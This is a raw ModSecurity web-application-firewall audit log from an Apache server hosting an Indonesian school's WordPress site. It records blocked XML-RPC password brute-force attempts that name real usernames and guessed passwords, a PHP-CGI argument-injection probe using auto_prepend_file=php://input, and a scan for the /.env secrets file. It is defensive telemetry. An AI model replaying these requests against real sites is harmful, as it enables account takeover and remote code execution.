p2=2811, p3=0, p4=0, p5=121, sr=80, sw=94, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --824e1362-Z-- --df41471a-A-- [16/Apr/2025:11:57:56 +0700] Z_841Cpe92T0H9-Aa0zBFwAAAEs 103.236.140.4 46598 103.236.140.4 8181 --df41471a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --df41471a-C-- wp.getUsersBlogs timkreatif 1201230 --df41471a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --df41471a-E-- --df41471a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (143+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744779476624501 4245 (- - -) Stopwatch2: 1744779476624501 4245; combined=3229, p1=353, p2=2711, p3=0, p4=0, p5=96, sr=79, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --df41471a-Z-- --8ec76974-A-- [16/Apr/2025:11:58:56 +0700] Z_85ECpe92T0H9-Aa0zBSwAAAEw 103.236.140.4 46882 103.236.140.4 8181 --8ec76974-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --8ec76974-C-- wp.getUsersBlogs timkreatif foobar --8ec76974-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ec76974-E-- --8ec76974-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (141+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744779536081934 4325 (- - -) Stopwatch2: 1744779536081934 4325; combined=3383, p1=375, p2=2839, p3=0, p4=0, p5=98, sr=84, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ec76974-Z-- --182b2b0a-A-- [16/Apr/2025:11:59:26 +0700] Z_85Lipe92T0H9-Aa0zBkwAAAEU 103.236.140.4 47038 103.236.140.4 8181 --182b2b0a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --182b2b0a-C-- wp.getUsersBlogs timkreatif 1234%^&* --182b2b0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --182b2b0a-E-- --182b2b0a-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744779566337693 4891 (- - -) Stopwatch2: 1744779566337693 4891; combined=3589, p1=424, p2=2974, p3=0, p4=0, p5=112, sr=86, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --182b2b0a-Z-- --8e8ae10b-A-- [16/Apr/2025:11:59:56 +0700] Z_85TCpe92T0H9-Aa0zB0AAAAEc 103.236.140.4 47188 103.236.140.4 8181 --8e8ae10b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --8e8ae10b-C-- wp.getUsersBlogs timkreatif dubsmash --8e8ae10b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e8ae10b-E-- --8e8ae10b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (148+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744779596277520 3351 (- - -) Stopwatch2: 1744779596277520 3351; combined=2525, p1=278, p2=2115, p3=0, p4=0, p5=77, sr=63, sw=55, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e8ae10b-Z-- --f390456a-A-- [16/Apr/2025:12:00:56 +0700] Z_85iCpe92T0H9-Aa0zCMgAAAEQ 103.236.140.4 47472 103.236.140.4 8181 --f390456a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f390456a-C-- wp.getUsersBlogs timkreatif 20100728 --f390456a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f390456a-E-- --f390456a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (138+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744779656307096 4422 (- - -) Stopwatch2: 1744779656307096 4422; combined=3392, p1=376, p2=2836, p3=0, p4=0, p5=104, sr=83, sw=76, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f390456a-Z-- --e6360e7a-A-- [16/Apr/2025:12:01:56 +0700] Z_85xCpe92T0H9-Aa0zCfAAAAEs 103.236.140.4 47694 103.236.140.4 8181 --e6360e7a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e6360e7a-C-- wp.getUsersBlogs timkreatif rangers1 --e6360e7a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e6360e7a-E-- --e6360e7a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (107+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744779716251152 4378 (- - -) Stopwatch2: 1744779716251152 4378; combined=3374, p1=390, p2=2820, p3=0, p4=0, p5=96, sr=83, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e6360e7a-Z-- --a0d63a01-A-- [16/Apr/2025:12:02:56 +0700] Z_86AJVnVduWmh0dMDMa_AAAAIs 103.236.140.4 47982 103.236.140.4 8181 --a0d63a01-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a0d63a01-C-- wp.getUsersBlogs miswan miswan2016 --a0d63a01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a0d63a01-E-- --a0d63a01-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (143+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744779776281761 4207 (- - -) Stopwatch2: 1744779776281761 4207; combined=3217, p1=359, p2=2692, p3=0, p4=0, p5=97, sr=79, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0d63a01-Z-- --30936f4d-A-- [16/Apr/2025:12:03:56 +0700] Z_86PCpe92T0H9-Aa0zCpQAAAEg 103.236.140.4 48272 103.236.140.4 8181 --30936f4d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --30936f4d-C-- wp.getUsersBlogs miswan trustno1 --30936f4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --30936f4d-E-- --30936f4d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (138+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744779836336904 4366 (- - -) Stopwatch2: 1744779836336904 4366; combined=3420, p1=383, p2=2869, p3=0, p4=0, p5=98, sr=79, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --30936f4d-Z-- --28a2e56d-A-- [16/Apr/2025:12:04:56 +0700] Z_86eCpe92T0H9-Aa0zDEgAAAEA 103.236.140.4 48576 103.236.140.4 8181 --28a2e56d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --28a2e56d-C-- wp.getUsersBlogs miswan 123465 --28a2e56d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --28a2e56d-E-- --28a2e56d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (142+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744779896273293 4861 (- - -) Stopwatch2: 1744779896273293 4861; combined=3425, p1=451, p2=2817, p3=0, p4=0, p5=92, sr=87, sw=65, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --28a2e56d-Z-- --617b814b-A-- [16/Apr/2025:12:05:56 +0700] Z_86tBk9XPLR9cFiTEvIDQAAAA8 103.236.140.4 48854 103.236.140.4 8181 --617b814b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --617b814b-C-- wp.getUsersBlogs miswan 852654 --617b814b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --617b814b-E-- --617b814b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (133+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744779956132475 4226 (- - -) Stopwatch2: 1744779956132475 4226; combined=3221, p1=340, p2=2714, p3=0, p4=0, p5=97, sr=78, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --617b814b-Z-- --4adc240f-A-- [16/Apr/2025:12:06:56 +0700] Z_868Bk9XPLR9cFiTEvIpAAAAAM 103.236.140.4 49168 103.236.140.4 8181 --4adc240f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --4adc240f-C-- wp.getUsersBlogs miswan qwe123!@# --4adc240f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4adc240f-E-- --4adc240f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (131+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744780016350488 4308 (- - -) Stopwatch2: 1744780016350488 4308; combined=3240, p1=360, p2=2725, p3=0, p4=0, p5=90, sr=81, sw=65, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4adc240f-Z-- --9b57f96b-A-- [16/Apr/2025:12:06:56 +0700] Z_868Bk9XPLR9cFiTEvIpQAAAAI 103.236.140.4 49170 103.236.140.4 8181 --9b57f96b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9b57f96b-C-- wp.getUsersBlogs miswan 1234%^&* --9b57f96b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9b57f96b-E-- --9b57f96b-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744780016697472 4288 (- - -) Stopwatch2: 1744780016697472 4288; combined=3293, p1=340, p2=2780, p3=0, p4=0, p5=103, sr=78, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9b57f96b-Z-- --f2ceae2c-A-- [16/Apr/2025:12:07:57 +0700] Z_87LRk9XPLR9cFiTEvJGQAAAAQ 103.236.140.4 49460 103.236.140.4 8181 --f2ceae2c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f2ceae2c-C-- wp.getUsersBlogs miswan Testing1 --f2ceae2c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f2ceae2c-E-- --f2ceae2c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (143+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744780077053958 3661 (- - -) Stopwatch2: 1744780077053958 3661; combined=2790, p1=344, p2=2301, p3=0, p4=0, p5=85, sr=72, sw=60, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f2ceae2c-Z-- --a2a2a856-A-- [16/Apr/2025:12:08:57 +0700] Z_87aRk9XPLR9cFiTEvJgwAAABY 103.236.140.4 49732 103.236.140.4 8181 --a2a2a856-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a2a2a856-C-- wp.getUsersBlogs miswan superman1 --a2a2a856-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a2a2a856-E-- --a2a2a856-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (127+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744780137240224 4440 (- - -) Stopwatch2: 1744780137240224 4440; combined=3304, p1=349, p2=2760, p3=0, p4=0, p5=111, sr=82, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a2a2a856-Z-- --f947cc62-A-- [16/Apr/2025:14:34:15 +0700] Z_9dd5VnVduWmh0dMDMb1gAAAIY 103.236.140.4 51418 103.236.140.4 8181 --f947cc62-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 102.211.152.45 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 102.211.152.45 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --f947cc62-C-- --f947cc62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f947cc62-E-- --f947cc62-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744788855276394 4911 (- - -) Stopwatch2: 1744788855276394 4911; combined=3091, p1=518, p2=2539, p3=0, p4=0, p5=34, sr=79, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f947cc62-Z-- --7061af0c-A-- [16/Apr/2025:15:42:27 +0700] Z_9tc0-sESiKFppgz04h0wAAANQ 103.236.140.4 52022 103.236.140.4 8181 --7061af0c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.65.63.18 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.65.63.18 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --7061af0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7061af0c-H-- 